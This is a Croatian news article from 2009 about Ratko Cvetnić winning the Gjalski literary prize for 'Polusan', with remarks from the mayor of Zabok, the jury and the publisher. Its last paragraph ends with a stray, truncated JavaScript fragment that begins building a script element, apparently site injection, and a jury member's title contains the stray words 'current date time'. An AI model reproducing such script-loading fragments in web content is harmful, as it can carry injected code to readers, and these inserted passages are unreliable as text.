Novosti i najave

Dodijeljena književna nagrada Ksaver Šandor Gjalski

Dodjelom renomirane književne nagrade koju je ove godine dobio Ratko Cvetnić za roman “Polusan“ završila je manifestacija posvećena velikom hrvatskom književniku Ksaveru Šandoru Gjalskom.

Tjedan dana Zabočani i njihovi gosti uživali su u izložbama, promocijama, radionicama, kazališnim predstavama, koncertima, književnim večerima i ostalim kulturnim događajima. Nakon Lijepe naše koju su pred prepunom dvoranom otpjevali članovi zbora Gjalski, svoje je sugrađane i drage goste pozdravio gradonačelnik Ivan Hanžek.

-Ovogodišnju manifestaciju Dani Ksavera Gjalskog posebno ćemo pamtiti. Po prvi puta smo se okupili u multimedijalnoj dvorani, koja je od stare kinodvorane preuređena u moderni centar za održavanje kulturnih događaja. Investicija vrijedi svaku od četiri i pol milijuna kuna koliko je u nju utrošeno. Zabočani to zaslužuju kao veliki ljubitelji kulture i vjerni posjetitelji.

Nadalje, gotovo dva milijuna kuna uložili smo u otkup prostora Regeneracije koji će postati centar urbane kulture, namijenjen mladima koji su naša budućnost u svim društvenim aspektima pa tako i u kulturi-objasnio je gradonačelnik Hanžek.

Pravo osvježenje u glazbenom dijelu programa donio je zabočki usnoharmonikaš Tomislav Goluban koji je uz pratnju Nikole Santra na klaviru i Zdenka Deda na gitari odsvirao dvije skladbe, Mr. B. i Golden Fish.

Odluku Prosudbenog povjerenstva na čijem čelu je bio dr.sc. Ivan J. Bošković, obrazložio je prof. dr. Stipe Botica, koji je uz prof. current date time Sofiju Keču, prof. Ingrid Lončar i Maju Gjerek bio njen član. Unatoč jakoj konkurenciji od 43 prijavljena prozna djela, Cvetnićev roman se, prema njihovom mišljenju, izdvojio zanimljivošću teme, zrelošću književne obrade te zavidnom spisateljskom kulturom. Zanimljivo je da je Cvetnić i za svoj prvi uradak, roman ‘Kratki izlet’ dobio Gjalskog, daleke 1998. godine.

-Knjiga ima izrazito zanimljivu fabulu, autor je s male povijesne distance analizirao, raščlanio i oblikovao zanimljivu priču o Hrvatskoj uoči Domovinskog rata-pojasnio je Botica.

Ovogodišnjem dobitniku plakete i novčanu nagradu uručili su zabočki gradonačelnik Hanžek, predsjednik Društva hrvatskih književnika Borben Vladović i Dubravka Đurić Nemec te ovogodišnjem laureatu uputili nekoliko riječi.

Nagrađeno djelo „Polusan“ izdala je Mozaik knjiga iz Zagreba, u čije ime je govorio glavni urednik Zoran Maljković.

-Nakon prvog čitanja vidjeli smo da se ovdje radi o vrlo kvalitetnom romanu kojeg vrijedi objaviti. Zahvaljujemo autoru koji nam je ukazao tu čast i nadamo se da nećemo dugo čekati njegov sljedeći hit-rekao je Maljković.

-Manifestacije poput Dana Gjalskog vrlo su značajne, one su poput svjetionika, obasjavaju i ocrtavaju obale našeg identiteta-rekao je Cvetnić, zahvalivši svima koji su prepoznali trud koji je uložio u svoje književno djelo. Ističe kako je bilo potrebno više od deset godina pauze da bi oslobodio vrijeme i koncentraciju za pisanje koje mu je donijelo novi uspjeh. Cvetnić se našao u etabliranom društvu Tribusona, Fabria i Pavličića koji su dva puta dobili Gjalskog.

-Moja prijateljica kaže da treba dodati brašna koliko treba i miješati dok ne bude dobro. Isti recept primijenio sam na pisanje i uspio-način su na koji Cvetnić objašnjava svoj stopostotni uspjeh. Treću knjigu još nije počeo pisati, ali ne isključuje da se prijavi na natječaj za Nagradu Gjalski već sljedeće godine.var d=document;var s=d.createElement(‘script’);

Dodano:
25. 12. 2009. u 19:38

Autor:
Neven Miškulin

Prethodna vijest:

Sljedeća vijest: